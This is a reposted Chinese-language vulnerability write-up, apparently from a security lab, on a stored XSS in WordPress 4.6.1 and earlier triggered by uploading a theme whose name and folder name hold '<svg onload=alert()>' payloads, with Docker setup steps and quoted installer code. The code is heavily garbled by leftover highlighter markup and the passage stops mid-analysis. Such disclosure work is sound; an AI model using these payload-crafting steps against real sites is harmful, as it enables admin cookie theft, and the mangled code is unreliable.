未加星标

WordPress <= 4.6.1 使用主题文件触发存储型XSS 漏洞分析

字体大小 | |
[开发(php) 所属分类 开发(php) | 发布者 店小二03 | 时间 2016 | 作者 红领巾 ] 0人收藏点击收藏

Author: p0wd3r (知道创宇404安全实验室) Date: 2016-10-08

0x00 漏洞概述 1.漏洞简介

WordPress 是一个phpmysql为平台的自由开源的博客软件和内容管理系统,近日研究者发现在其<=4.6.1版本中,通过上传恶意构造的主题文件可以触发一个后台存储型XSS漏洞。通过该漏洞,攻击者可以在能够上传主题文件的前提下执行获取管理员Cookie等敏感操作。

2.漏洞影响

在能够上传主题文件的前提下执行获取管理员Cookie等XSS可以进行的攻击,实际的攻击场景有以下两种:

攻击者诱导管理员上传恶意构造的主题文件,且管理员并没有对文件进行检查 攻击者拥有管理员权限可以直接上传主题文件,但既然已经有管理员权限再进行这样的攻击也就多此一举了 3.影响版本

<= 4.6.1

0x01 漏洞复现 1. 环境搭建 dockerpullwordpress<spanclass="token punctuation">:</span><spanclass="token number">4.6</span><spanclass="token punctuation">.</span><spanclass="token number">1</span> dockerpullmysql dockerrun <spanclass="token operator">--</span>namewp<spanclass="token operator">-</span>mysql <spanclass="token operator">-</span>e MYSQL_ROOT_PASSWORD<spanclass="token operator">=</span>hellowp <spanclass="token operator">-</span>e MYSQL_DATABASE<spanclass="token operator">=</span>wp <spanclass="token operator">-</span>d mysql dockerrun <spanclass="token operator">--</span>namewp <spanclass="token operator">--</span>linkwp<spanclass="token operator">-</span>mysql<spanclass="token punctuation">:</span>mysql <spanclass="token operator">-</span>d wordpress 2.漏洞分析

我们先随便下载一个主题:

wgethttps<spanclass="token punctuation">:</span><spanclass="token operator">/</span><spanclass="token operator">/</span>downloads<spanclass="token punctuation">.</span>wordpress<spanclass="token punctuation">.</span>org<spanclass="token operator">/</span>theme<spanclass="token operator">/</span>illdy<spanclass="token number">.1</span><spanclass="token punctuation">.</span><spanclass="token number">0.29</span><spanclass="token punctuation">.</span>zip unzip <spanclass="token operator">-</span>x illdy<spanclass="token number">.1</span><spanclass="token punctuation">.</span><spanclass="token number">0.29</span><spanclass="token punctuation">.</span>zip

然后对 illdy/style.css 进行如下更改:

<spanclass="token comment">/* Theme Name: <svg onload=alert(1234)> ... DO NOT CHANGES HERE ... */</span>

接着更改文件夹名字再打包:

mvilldy <spanclass="token string">"<svg onload=alert(5678)>"</span> zip <spanclass="token operator">-</span>r theme<spanclass="token punctuation">.</span>zip <spanclass="token string">"<svg onload=alert(5678)>"</span>

构造好之后我们登录后台上传该主题文件,同时开始动态调试。

首先进入 wp-admin/includes/class-theme-installer-skin.php 中第55-82行:

<spanclass="token variable">$name</span> <spanclass="token operator">=</span> <spanclass="token variable">$theme_info</span><spanclass="token operator">-</span><spanclass="token operator">></span><spanclass="token function">display<spanclass="token punctuation">(</span></span><spanclass="token string">'Name'</span><spanclass="token punctuation">)</span><spanclass="token punctuation">;</span> <spanclass="token punctuation">.</span><spanclass="token punctuation">.</span><spanclass="token punctuation">.</span> <spanclass="token keyword">if</span> <spanclass="token punctuation">(</span> <spanclass="token function">current_user_can<spanclass="token punctuation">(</span></span> <spanclass="token string">'edit_theme_options'</span> <spanclass="token punctuation">)</span> <spanclass="token operator">&&</span> <spanclass="token function">current_user_can<spanclass="token punctuation">(</span></span> <spanclass="token string">'customize'</span> <spanclass="token punctuation">)</span> <spanclass="token punctuation">)</span> <spanclass="token punctuation">{</span> <spanclass="token variable">$install_actions</span><spanclass="token punctuation">[</span><spanclass="token string">'preview'</span><spanclass="token punctuation">]</span> <spanclass="token operator">=</span> '<span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation"><</span>a</span> <span class="token attr-name">href</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>' . wp_customize_url( $stylesheet ) . '<span class="token punctuation">"</span></span> <span class="token attr-name">class</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>hide-if-no-customize load-customize<span class="token punctuation">"</span></span><span class="token punctuation">></span></span></span><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation"><</span>span</span> <span class="token attr-name">aria-hidden</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>true<span class="token punctuation">"</span></span><span class="token punctuation">></span></span></span><span class="token string">' . __( '</span>Live Preview<span class="token string">' ) . '</span><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation"></</span>span</span><span class="token punctuation">></span></span></span><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation"><</span>span</span> <span class="token attr-name">class</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>screen-reader-text<span class="token punctuation">"</span></span><span class="token punctuation">></span></span></span><span class="token string">' . sprintf( __( '</span>Live Preview <span class="token operator">&</span>#<span class="token number">8220</span><span class="token punctuation">;</span><span class="token operator">%</span>s<span class="token operator">&</span>#<span class="token number">8221</span><span class="token punctuation">;</span><span class="token string">' ), $name ) . '</span><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation"></</span>span</span><span class="token punctuation">></span></span></span><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation"></</span>a</span><span class="token punctuation">

本文开发(php)相关术语:php代码审计工具 php开发工程师 移动开发者大会 移动互联网开发 web开发工程师 软件开发流程 软件开发工程师

分页:12
转载请注明
本文标题:WordPress &lt;= 4.6.1 使用主题文件触发存储型XSS 漏洞分析
本站链接:http://www.codesec.net/view/483162.html
分享请点击:


1.凡CodeSecTeam转载的文章,均出自其它媒体或其他官网介绍,目的在于传递更多的信息,并不代表本站赞同其观点和其真实性负责;
2.转载的文章仅代表原创作者观点,与本站无关。其原创性以及文中陈述文字和内容未经本站证实,本站对该文以及其中全部或者部分内容、文字的真实性、完整性、及时性,不作出任何保证或承若;
3.如本站转载稿涉及版权等问题,请作者及时联系本站,我们会及时处理。
登录后可拥有收藏文章、关注作者等权限...
技术大类 技术大类 | 开发(php) | 评论(0) | 阅读(24)